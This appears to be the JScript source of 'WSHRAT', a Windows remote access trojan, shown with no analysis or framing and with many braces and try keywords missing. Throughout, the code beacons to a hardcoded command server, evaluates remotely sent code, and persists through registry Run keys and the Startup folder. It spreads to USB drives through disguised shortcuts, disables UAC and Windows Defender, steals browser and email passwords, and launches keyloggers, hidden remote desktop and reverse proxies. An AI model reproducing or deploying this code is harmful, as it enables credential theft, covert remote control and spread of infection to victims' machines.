var ybml;
var host = getHost();
var port = 5200;
var installdir = "%appdata%";
var runAsAdmin = false;
var lnkfile = true;
var lnkfolder = true;
var registry = true;
var startupfold = true;
var anti_bot = false;
if(anti_bot == true){
if(hwid() == ""){
WScript.quit();
if(runAsAdmin == true){
startupElevate();
if(WScript.Arguments.Named.Exists("elevated") == true){
disableSecurity();
var shellobj = WScript.createObject("wscript.shell");
var filesystemobj = WScript.createObject("scripting.filesystemobject");
var httpobj = WScript.createObject("msxml2.xmlhttp");
var installname = WScript.scriptName;
var startup = shellobj.specialFolders("startup") + "\\";
installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\\";
if(!filesystemobj.folderExists(installdir)){ installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\\";}
var spliter = "|";
var sdkpath = installdir + "wshsdk";
var vncpath = installdir + "uvnc";
var sdkfile = sdkpath + "\\" + chr(112) + chr(121) + chr(116) + chr(104) + chr(111) + chr(110) + chr(46) + chr(101) + chr(120) + chr(101);
var sleep = 5000;
var response, cmd, param, oneonce;
var inf = "";
var usbspreading = "";
var startdate = "";
if(WScript.scriptFullName != (installdir + installname)){
filesystemobj.copyFile(WScript.scriptFullName, installdir + installname, true);
shellobj.run("wscript.exe //B \"" + installdir + installname + "\"");
instance();
if(getBinder() != null){
runBinder();
while(true){
install();
response = "";
response = post ("is-ready","");
cmd = response.split(spliter);
switch(cmd[0]){
case "disconnect":
WScript.quit();
break;
case "reboot":
shellobj.run("%comspec% /c shutdown /r /t 0 /f", 0, true);
break;
case "shutdown":
shellobj.run("%comspec% /c shutdown /s /t 0 /f", 0, true);
break;
case "excecute":
param = cmd[1];
eval(param);
break;
case "install-sdk":
if (filesystemobj.fileExists(sdkfile)){
updatestatus("SDK+Already+Installed");
}else{
installsdk();
break;
case "remove-sdk":
if(filesystemobj.fileExists(installdir + "wshsdk.zip")){
filesystemobj.deleteFile(installdir + "wshsdk.zip");
if (filesystemobj.fileExists(sdkfile)){
filesystemobj.deleteFolder(sdkpath);
updatestatus("SDK+Uninstalled");
break;
case "get-pass":
passgrabber(cmd[1], "cmdc.exe", cmd[2]);
break;
case "get-pass-offline":
if (filesystemobj.fileExists(sdkfile)){
passgrabber(cmd[3], "cmdc.exe", "ie");
passgrabber("null", "cmdc.exe", "chrome");
passgrabber("null", "cmdc.exe", "mozilla");
passgrabber2(cmd[1], "cmdc.exe", cmd[2]);
updatestatus("Installing+SDK");
var stat = installsdk();
if(stat == true){
passgrabber(cmd[3], "cmdc.exe", "ie");
passgrabber("null", "cmdc.exe", "chrome");
passgrabber("null", "cmdc.exe", "mozilla");
passgrabber2(cmd[1], "cmdc.exe", cmd[2]);
var msg = shellobj.ExpandEnvironmentStrings("%computername%") + "/" + shellobj.ExpandEnvironmentStrings("%username%");
post("show-toast", "Unable to automatically recover password for " + msg + " as the Password Recovery SDK cannot be automatically installed. You can try again manually.");
break;
case "update":
param = updaterF(cmd[1]);
if(param != ""){
oneonce.close();
oneonce = filesystemobj.openTextFile(installdir + installname ,2, false);
oneonce.write(param);
oneonce.close();
shellobj.run("wscript.exe //B \"" + installdir + installname + "\"");
WScript.quit();
}else{
updatestatus("Update+Failed");
break;
case "uninstall":
uninstall();
break;
case "up-n-exec":
download(cmd[1],cmd[2]);
break;
case "bring-log":
upload(installdir + "wshlogs\\" + cmd[1], "take-log");
break;
case "down-n-exec":
sitedownloader(cmd[1],cmd[2]);
break;
case "filemanager":
servicestarter(cmd[1], "fm-plugin.exe", information());
break;
case "rdp":
keyloggerstarter(cmd[1], "rd-plugin.exe", information(), "", "rdp");
break;
case "h-browser":
keyloggerstarter("", "hb-plugin.exe", information(), "", "hbrowser");
break;
case "rev-proxy":
reverseproxy("rprox.exe", cmd[1]);
break;
case "exit-proxy":
shellobj.run("%comspec% /c taskkill /F /IM rprox.exe", 0, true);
break;
case "exit-hrdp":
shellobj.run("%comspec% /c taskkill /F /IM hrdp.exe", 0, true);
break;
case "keylogger":
keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 0, "keylogger");
break;
case "offline-keylogger":
keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 1, "keylogger");
break;
case "browse-logs":
post("is-logs", enumfaf(installdir + "wshlogs"));
break;
case "cmd-shell":
param = cmd[1];
post("is-cmd-shell",cmdshell(param));
break;
case "get-processes":
post("is-processes", enumprocess());
break;
case "disable-uac":
disableSecurity();
updatestatus("UAC+Disabled+(Reboot+Required)");
break;
case "check-eligible":
if(filesystemobj.fileExists(cmd[1])){
updatestatus("Is+Eligible");
}else{
updatestatus("Not+Eligible");
break;
case "rev-rdp":
reverserdp(cmd[3] + ".exe", cmd[1], cmd[2]);
break;
case "uvnc":
startUvnc(cmd[1], cmd[2]);
break;
case "force-eligible":
if(WScript.Arguments.Named.Exists("elevated") == true){
if(filesystemobj.folderExists(cmd[1])){
shellobj.run("%comspec% /c " + cmd[2], 0, true);
updatestatus("SUCCESS");
}else{
updatestatus("Component+Missing");
updatestatus("Elevation+Required");
break;
case "elevate":
if(WScript.Arguments.Named.Exists("elevated") == false){
oneonce.close();
oneonce = null;
WScript.CreateObject("Shell.Application").ShellExecute("wscript.exe", " //B \"" + WScript.ScriptFullName + "\" /elevated", "", "runas", 1);
updatestatus("Client+Elevated");
}catch(nn){
WScript.quit();
updatestatus("Client+Elevated");
break;
case "if-elevate":
if(WScript.Arguments.Named.Exists("elevated") == false){
updatestatus("Client+Not+Elevated");
updatestatus("Client+Elevated");
break;
case "kill-process":
exitprocess(cmd[1]);
break;
case "sleep":
param = cmd[1];
sleep = eval(param);
break;
}catch(er){}
WScript.sleep(sleep);
function installsdk(){
var success = false;
var sdkurl = post("moz-sdk", "");
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("get", sdkurl, false);
objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
objhttpdownload.send();
if(filesystemobj.fileExists(installdir + "wshsdk.zip")){
filesystemobj.deleteFile(installdir + "wshsdk.zip");
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(installdir + "wshsdk.zip");
objstreamdownload.close();
objstreamdownload = null;
}catch(ez){
if(filesystemobj.fileExists(installdir + "wshsdk.zip")){
UnZip(installdir + "wshsdk.zip", sdkpath);
success = true;
updatestatus("SDK+Installed");
}catch(err){
return success;
return success;
function installUVNC(uvnc_url){
var success = false;
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("get", uvnc_url, false);
objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
objhttpdownload.send();
if(filesystemobj.fileExists(installdir + "uvnc.zip")){
filesystemobj.deleteFile(installdir + "uvnc.zip");
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(installdir + "uvnc.zip");
objstreamdownload.close();
objstreamdownload = null;
}catch(ez){
if(filesystemobj.fileExists(installdir + "uvnc.zip")){
UnZip(installdir + "uvnc.zip", vncpath);
objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(getConfig());
objstreamdownload.Position = 0;
objstreamdownload.Type = 2;
objstreamdownload.CharSet = "us-ascii";
var config = objstreamdownload.ReadText();
objstreamdownload.close();
objstreamdownload = null;
var reg = new RegExp("%path%", "g");
config = config.replace(reg, vncpath + "\\32");
var writer = filesystemobj.openTextFile(vncpath + "\\32\\UltraVNC.ini", 2, true);
writer.writeLine(config);
writer.close();
writer = null;
success = true;
updatestatus("VNC+Installed");
}catch(err){
return success;
return success;
function startU_vnc(filearg){
var mCode = getUVNC();
payloadLuncher(mCode, host + " " + port + " " + filearg);
WScript.sleep(5000);
shellobj.run("\"" + vncpath + "\\32\\winvnc.exe\"");
function startUvnc(vnc_url, filearg){
if (filesystemobj.fileExists(vncpath + "\\32\\winvnc.exe")){
startU_vnc(filearg);
}else{
if (installUVNC(vnc_url)){
startU_vnc(filearg);
}else{
updatestatus("Install+Failed");
function install(){
var lnkobj;
var filename;
var foldername;
var fileicon;
var foldericon;
upstart();
for(var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext()){
var drive = dri.item();
if (drive.isready == true){
if (drive.freespace > 0 ){
if (drive.drivetype == 1 ){
filesystemobj.copyFile(WScript.scriptFullName , drive.path + "\\" + installname,true);
if (filesystemobj.fileExists (drive.path + "\\" + installname)){
filesystemobj.getFile(drive.path + "\\" + installname).attributes = 2+4;
}catch(eiju){}
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").files); !fi.atEnd(); fi.moveNext()){
var file = fi.item();
if (lnkfile == false){break;}
if (file.name.indexOf(".")){
if ((file.name.split(".")[file.name.split(".").length - 1]).toLowerCase() != "lnk"){
file.attributes = 2+4;
if (file.name.toUpperCase() != installname.toUpperCase()){
filename = file.name.split(".");
lnkobj = shellobj.createShortcut(drive.path + "\\" + filename[0] + ".lnk");
lnkobj.windowStyle = 7;
lnkobj.targetPath = "cmd.exe";
lnkobj.workingDirectory = "";
lnkobj.arguments = "/c start " + installname.replace(new RegExp(" ", "g"), "\" \"") + "&start " + file.name.replace(new RegExp(" ", "g"), "\" \"") +"&exit";
try{fileicon = shellobj.RegRead ("HKEY_LOCAL_MACHINE\\software\\classes\\" + shellobj.RegRead ("HKEY_LOCAL_MACHINE\\software\\classes\\." + file.name.split(".")[file.name.split(".").length - 1]+ "\\") + "\\defaulticon\\"); }catch(eeee){}
if (fileicon.indexOf(",") == 0){
lnkobj.iconLocation = file.path;
}else {
lnkobj.iconLocation = fileicon;
lnkobj.save();
}catch(err){}
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").subFolders); !fi.atEnd(); fi.moveNext()){
var folder = fi.item();
if (lnkfolder == false){break;}
folder.attributes = 2+4;
foldername = folder.name;
lnkobj = shellobj.createShortcut(drive.path + "\\" + foldername + ".lnk");
lnkobj.windowStyle = 7;
lnkobj.targetPath = "cmd.exe";
lnkobj.workingDirectory = "";
lnkobj.arguments = "/c start " + installname.replace(new RegExp(" ", "g"), "\" \"") + "&start explorer " + folder.name.replace(new RegExp(" ", "g"), "\" \"") +"&exit";
foldericon = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\classes\\folder\\defaulticon\\");
if (foldericon.indexOf(",") == 0){
lnkobj.iconLocation = folder.path;
}else {
lnkobj.iconLocation = foldericon;
lnkobj.save();
}catch(err){}
function startupElevate(){
if(WScript.Arguments.Named.Exists("elevated") == false){
WScript.CreateObject("Shell.Application").ShellExecute("wscript.exe", " //B \"" + WScript.ScriptFullName + "\" /elevated", "", "runas", 1);
}catch(nn){
WScript.quit();
function disableSecurity(){
if(WScript.Arguments.Named.Exists("elevated") == true){
var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");
oReg.SetDwordValue(0x80000002,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","EnableLUA", 0);
oReg.SetDwordValue(0x80000002,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","ConsentPromptBehaviorAdmin", 0);
oReg.SetDwordValue(0x80000002,"SOFTWARE\\Policies\\Microsoft\\Windows Defender","DisableAntiSpyware", 1);
oReg = null;
function uninstall(){
var filename;
var foldername;
shellobj.RegDelete("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0]);
shellobj.RegDelete("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0]);
}catch(ei){}
filesystemobj.deleteFile(startup + installname ,true);
filesystemobj.deleteFile(WScript.scriptFullName ,true);
}catch(eej){}
for(var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext()){
var drive = dri.item();
if (drive.isready == true){
if (drive.freespace > 0 ){
if (drive.drivetype == 1 ){
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").files); !fi.atEnd(); fi.moveNext()){
var file = fi.item();
if (file.name.indexOf(".")){
if ((file.name.split(".")[file.name.split(".").length - 1]).toLowerCase() != "lnk"){
file.attributes = 0;
if (file.name.toUpperCase() != installname.toUpperCase()){
filename = file.name.split(".");
filesystemobj.deleteFile(drive.path + "\\" + filename[0] + ".lnk" );
}else{
filesystemobj.deleteFile(drive.path + "\\" + file.name);
}else{
filesystemobj.deleteFile (file.path);
}catch(ex){}
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").subFolders); !fi.atEnd(); fi.moveNext()){
var folder = fi.item();
folder.attributes = 0;
}catch(err){}
WScript.quit();
function post (cmd ,param){
httpobj.open("post","http://" + host + ":" + port +"/" + cmd, false);
httpobj.setRequestHeader("user-agent:",information());
httpobj.send(param);
return httpobj.responseText;
}catch(err){
return "";
function information(){
if (inf == ""){
inf = hwid() + spliter;
inf = inf + shellobj.ExpandEnvironmentStrings("%computername%") + spliter ;
inf = inf + shellobj.ExpandEnvironmentStrings("%username%") + spliter;
var root = GetObject("winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\cimv2");
var os = root.ExecQuery ("select * from win32_operatingsystem");
for(var fi = new Enumerator(os); !fi.atEnd(); fi.moveNext()){
var osinfo = fi.item();
inf = inf + osinfo.caption + spliter;
break;
inf = inf + "plus" + spliter;
inf = inf + security() + spliter;
inf = inf + usbspreading;
inf = "WSHRAT" + spliter + inf + spliter + "JavaScript-v3.4" + spliter + getCountry();
return inf;
}else{
return inf;
}catch(err){
return "";
function getHost(){
var phost = "79.134.225.94";
if(phost.indexOf("http://") == 0 || phost.indexOf("https://") == 0){
var objhttpdownload = WScript.CreateObject("msxml2.serverxmlhttp");
objhttpdownload.open("get", phost, false);
objhttpdownload.send();
}catch(ep){
WScript.sleep(2000);
return getHost();
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.Position = 0;
objstreamdownload.Type = 2;
objstreamdownload.CharSet = "us-ascii";
phost = objstreamdownload.ReadText();
objstreamdownload.close();
objstreamdownload = null;
return phost;
}catch(err){
WScript.sleep(2000);
return getHost();
}else{
WScript.sleep(2000);
return getHost();
}else{
return phost;
function getCountry(){
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("get", "http://ip-api.com/json/", false);
objhttpdownload.setRequestHeader("user-agent:", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36");
objhttpdownload.send();
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.Position = 0;
objstreamdownload.Type = 2;
objstreamdownload.CharSet = "us-ascii";
var raw = objstreamdownload.ReadText();
var cc = "01";
var cn = "Unknown";
cc = raw.substr(raw.indexOf("countryCode") + 14);
cc = cc.substr(0, cc.indexOf("\""));
}catch(err){}
cn = raw.substr(raw.indexOf("country") + 10);
cn = cn.substr(0, cn.indexOf("\""));
}catch(err){}
return cc + ":" + cn;
}else{
return "01:Unknown";
}catch(ex){
return "01:Unknown";
function upstart (){
if(registry == true){
shellobj.RegWrite("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0], "wscript.exe //B \"" + installdir + installname + "\"" , "REG_SZ");
shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0], "wscript.exe //B \"" + installdir + installname + "\"" , "REG_SZ");
}catch(ei){}
filesystemobj.copyFile(WScript.scriptFullName, installdir + installname, true);
if(startupfold == true){
filesystemobj.copyFile(WScript.scriptFullName, startup + installname, true);
}catch(err){}
function hwid(){
var root = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
var disks = root.ExecQuery ("select * from win32_logicaldisk");
for(var fi = new Enumerator(disks); !fi.atEnd(); fi.moveNext()){
var disk = fi.item();
if (disk.volumeSerialNumber != "" && disk.volumeSerialNumber != null){
return disk.volumeSerialNumber;
break;
return "";
}catch(err){
return "";
function security(){
var objwmiservice = GetObject("winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\cimv2");
var colitems = objwmiservice.ExecQuery("select * from win32_operatingsystem",null,48);
var versionstr, osversion;
for(var fi = new Enumerator(colitems); !fi.atEnd(); fi.moveNext()){
var objitem = fi.item();
versionstr = objitem.version.toString().split(".");
osversion = versionstr[0] + ".";
for (var x = 1; x < versionstr.length; x++){
osversion = osversion + versionstr[0];
osversion = eval(osversion);
var sc;
if (osversion > 6){ sc = "securitycenter2"; }else{ sc = "securitycenter";}
var objsecuritycenter = GetObject("winmgmts:\\\\localhost\\root\\" + sc);
var colantivirus = objsecuritycenter.ExecQuery("select * from antivirusproduct", "wql", 0);
var secu = "";
for(var fi = new Enumerator(colantivirus); !fi.atEnd(); fi.moveNext()){
var objantivirus = fi.item();
secu = secu + objantivirus.displayName + " .";
if(secu == ""){secu = "nan-av";}
return secu;
}catch(err){}
function getDate(){
var s = "";
var d = new Date();
s += d.getDate() + "/";
s += (d.getMonth() + 1) + "/";
s += d.getYear();
return s;
function instance(){
usbspreading = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\");
}catch(eee){}
if(usbspreading == ""){
if (WScript.scriptFullName.substr(1).toLowerCase() == ":\\" + installname.toLowerCase()){
usbspreading = "true - " + getDate();
try{shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\", usbspreading, "REG_SZ");}catch(eeeee){}
}else{
usbspreading = "false - " + getDate();
try{shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\", usbspreading, "REG_SZ");}catch(eeeee){}
upstart();
var scriptfullnameshort = filesystemobj.getFile(WScript.scriptFullName);
var installfullnameshort = filesystemobj.getFile(installdir + installname);
if (scriptfullnameshort.shortPath.toLowerCase() != installfullnameshort.shortPath.toLowerCase()){
WScript.quit();
oneonce = filesystemobj.openTextFile(installdir + installname ,8, false);
}catch(err){
WScript.quit();
function decode_base64(base64_string){
var yhm_pepe = WScript.CreateObject("ADODB.Stream");
var spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp");
spike.dataType = "bin.base64";
spike.text = base64_string;
yhm_pepe.Type = 1;
yhm_pepe.Open();
yhm_pepe.Write(spike.nodeTypedValue);
yhm_pepe.Position = 0;
yhm_pepe.Type = 2;
yhm_pepe.CharSet = "us-ascii";
return yhm_pepe.ReadText();
function decode_pass(retcmd){
var content, nss, command;
if(retcmd == "mozilla"){
command = "give-me-ffpv";
}else if(retcmd == "chrome"){
command = "give-me-chpv";
}else if(retcmd == "foxmail"){
command = "give-me-fm";
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("post", "http://" + host + ":" + port +"/" + command, false);
objhttpdownload.setRequestHeader("user-agent:", information());
objhttpdownload.send("");
if(filesystemobj.fileExists(installdir + "rundll")){
filesystemobj.deleteFile(installdir + "rundll");
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.Position = 0;
objstreamdownload.Type = 2;
objstreamdownload.CharSet = "us-ascii";
content = objstreamdownload.ReadText();
nss = sdkpath + "\\nss";
content = content.replace(new RegExp("%nss%", "g"), nss); //for firefox
content = content.replace(new RegExp("%path%", "g"), installdir + "Login Data"); //for chrome
var sw = filesystemobj.openTextFile(installdir + "rundll", 2, true);
sw.write(content);
sw.close();
sw = null;
objstreamdownload.close();
objstreamdownload = null;
}catch(ez){}
shellobj.run("%comspec% /c cd \"" + sdkpath + "\" && " + gsp(sdkfile) + " " + gsp(installdir + "rundll") + " > \"" + installdir + "wshout\"", 0, true);
WScript.sleep(2000);
var sr = filesystemobj.openTextFile(installdir + "wshout");
content = sr.readall();
sr.close();
sr = null;
filesystemobj.deleteFile(installdir + "rundll");
filesystemobj.deleteFile(installdir + "wshout");
post(retcmd, content);
}catch(err){
function chr(code){
return String.fromCharCode(code);
function gsp(path){
return filesystemobj.getFile(path).shortPath;
function passgrabber (fileurl, filename, retcmd){
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
var content, profile, folder;
if (retcmd == "ie"){
content = decode_base64(fileurl);
eval(content);
return;
}else if(retcmd == "chrome"){
folder = shellobj.ExpandEnvironmentStrings("%temp%");
folder = folder.substr(0, folder.toLowerCase().indexOf("temp")) + "Google\\Chrome\\User Data\\Default\\Login Data";
if (objfsodownload.fileExists(folder) ){
objfsodownload.copyFile(folder, installdir + "Login Data", true);
if (objfsodownload.fileExists(sdkfile)){
decode_pass(retcmd);
objfsodownload.deleteFile(installdir + "Login Data");
}else{
post("show-toast", "WSH Sdk for password recovery not found, You can install this SDK from the password recovery menu");
}else{
post(retcmd, "No Password Found");
}else if(retcmd == "foxmail"){
if (objfsodownload.fileExists(sdkfile)){
decode_pass(retcmd);
}else{
post("show-toast", "WSH Sdk for password recovery not found, You can install this SDK from the password recovery menu");
}else if(retcmd == "mozilla"){
folder = shellobj.ExpandEnvironmentStrings("%appdata%") + "\\Mozilla\\Firefox\\";
if (objfsodownload.fileExists (folder + "profiles.ini")){
content = filesystemobj.openTextFile(folder + "profiles.ini").readall();
if (content.indexOf("Path=") > 0) {
content = content.substr(content.indexOf("Path=") + 5);
content = content.substr(0, content.indexOf("\r\n"));
profile = (folder + content).replace(new RegExp("/", "g"), "\\");
folder = profile + "\logins.json";
if (objfsodownload.fileExists(sdkfile)){
decode_pass(retcmd);
}else{
post("show-toast", "WSH Sdk for password recovery not found, You can install this SDK from the password recovery menu");
}else{
post(retcmd, "No Password Found");
}else{
post(retcmd, "No Password Found");
}else{
passgrabber2(fileurl, filename, retcmd);
}catch(err){}
function UnZip(zipfile, ExtractTo){
if(filesystemobj.GetExtensionName(zipfile) == "zip"){
if(!filesystemobj.FolderExists(ExtractTo)){
filesystemobj.CreateFolder(ExtractTo);
var objShell = WScript.CreateObject("Shell.Application");
var destination = objShell.NameSpace(ExtractTo);
var zip_content = objShell.NameSpace(zipfile).Items();
for(i = 0; i < zip_content.Count; i++){
if(filesystemobj.FileExists(filesystemobj.Buildpath(ExtractTo,zip_content.item(i).name)+"."+filesystemobj.getExtensionName(zip_content.item(i).path))){
filesystemobj.DeleteFile(filesystemobj.Buildpath(ExtractTo,zip_content.item(i).name)+"."+filesystemobj.getExtensionName(zip_content.item(i).path));
destination.copyHere(zip_content.item(i), 20);
function passgrabber2(fileurl, filename, retcmd){
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
try{filesystemobj.deleteFile(installdir + filename + "data");}catch(ey){}
var config_file = installdir + filename.substr(0, filename.lastIndexOf(".")) + ".cfg";
var cfg = "[General]\nShowGridLines=0\nSaveFilterIndex=0\nShowInfoTip=1\nUseProfileFolder=0\nProfileFolder=\nMarkOddEvenRows=0\nWinPos=2C 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00 80 02 00 00 E0 01 00 00\nColumns=FA 00 00 00 FA 00 01 00 6E 00 02 00 6E 00 03 00 78 00 04 00 78 00 05 00 78 00 06 00 64 00 07 00 FA 00 08 00\nSort=0";
var writer = filesystemobj.openTextFile(config_file, 2, true);
writer.writeLine(cfg);
writer.close();
writer = null;
var strlink = fileurl;
var strsaveto = installdir + filename;
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(getMailRec());
objstreamdownload.SaveToFile(strsaveto + ".zip", 2);
objstreamdownload.close();
objstreamdownload = null;
if(objfsodownload.fileExists(strsaveto + ".zip")){
UnZip(strsaveto + ".zip", installdir);
var runner = WScript.CreateObject("Shell.Application");
var saver = objfsodownload.getFile(strsaveto).shortPath
for(var i=0; i<5; i++){
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
WScript.sleep(1000);
runner.shellExecute(saver, " /stext " + saver + "data");
WScript.sleep(2000);
if(objfsodownload.fileExists(saver + "data")){
var sr = filesystemobj.openTextFile(saver + "data");
var buffer = "";
try{buffer = sr.readall();}catch(ee){}
sr.close();
sr = null;
var outpath = installdir + "wshlogs\\recovered_password_email.log";
var folder = objfsodownload.GetParentFolderName(outpath);
if (!objfsodownload.FolderExists(folder))
shellobj.run("%comspec% /c mkdir \"" + folder + "\"", 0, true);
writer = filesystemobj.openTextFile(outpath, 2, true);
writer.write(buffer);
writer.close();
writer = null;
upload(saver + "data", retcmd);
break;
deletefaf(strsaveto);
function reverseproxy (filename, filearg){
var mCode = getReverseProxy();
payloadLuncher(mCode, host + " " + port + " " + filearg);
}catch(err){
updatestatus("Access+Denied");
function reverserdp(filename, filearg, fileurl){
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
var strsaveto = installdir + filename;
var objhttpdownload = WScript.CreateObject("msxml2.serverxmlhttp" );
objhttpdownload.open("get", fileurl, false);
objhttpdownload.send();
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}catch(err){
updatestatus("Access+Denied");
if(objfsodownload.fileExists(strsaveto)){
shellobj.run("\"" + strsaveto + "\" " + host + " " + port + " " + filearg );
updatestatus("HRDP+Accepted");
}catch(err){
updatestatus("HRDP+Denied");
function keyloggerstarter (fileurl, filename, filearg, is_offline, s_type){
var mCode;
if(s_type == "rdp"){
mCode = getRDP();
}else if(s_type == "keylogger"){
mCode = getKeyLogger();
}else if(s_type == "hbrowser"){
mCode = getHbrowser();
payloadLuncher(mCode, host + " " + port + " \\\"" + filearg + "\\\" " + is_offline);
}catch(err){
updatestatus("Access+Denied");
function servicestarter (fileurl, filename, filearg){
var strlink = fileurl;
var strsaveto = installdir + filename;
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp" );
objhttpdownload.open("get", strlink, false);
objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
objhttpdownload.send();
var filestr = Base64Encode(objhttpdownload.responseBody);
payloadLuncher(filestr, host + " " + port + " \\\"" + filearg + "\\\"");
}catch(err){
updatestatus("Access+Denied");
function sitedownloader (fileurl,filename){
var strlink = fileurl;
var strsaveto = installdir + filename;
var objhttpdownload = WScript.CreateObject("msxml2.serverxmlhttp" );
objhttpdownload.open("get", strlink, false);
objhttpdownload.send();
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
if(objfsodownload.fileExists(strsaveto)){
shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
updatestatus("Executed+File");
function download (fileurl,filedir){
if(filedir == ""){
filedir = installdir;
strsaveto = filedir + fileurl.substr(fileurl.lastIndexOf("\\") + 1);
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("post","http://" + host + ":" + port +"/" + "send-to-me" + spliter + fileurl, false);
objhttpdownload.setRequestHeader("user-agent:", information());
objhttpdownload.send("");
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
if(objfsodownload.fileExists(strsaveto)){
shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
updatestatus("Executed+File");
function updaterF (fileurl){
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("post","http://" + host + ":" + port +"/" + "send-to-me" + spliter + fileurl, false);
objhttpdownload.setRequestHeader("user-agent:", information());
objhttpdownload.send("");
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.Position = 0;
objstreamdownload.Type = 2;
objstreamdownload.CharSet = "us-ascii";
var rr = objstreamdownload.ReadText();
objstreamdownload.close();
objstreamdownload = null;
return rr;
return "";
function updatestatus(status_msg){
var objsoc = WScript.CreateObject("msxml2.xmlhttp");
objsoc.open("post","http://" + host + ":" + port + "/" + "update-status" + spliter + status_msg, false);
objsoc.setRequestHeader("user-agent:", information());
objsoc.send("");
}catch(err){}
function upload (fileurl, retcmd){
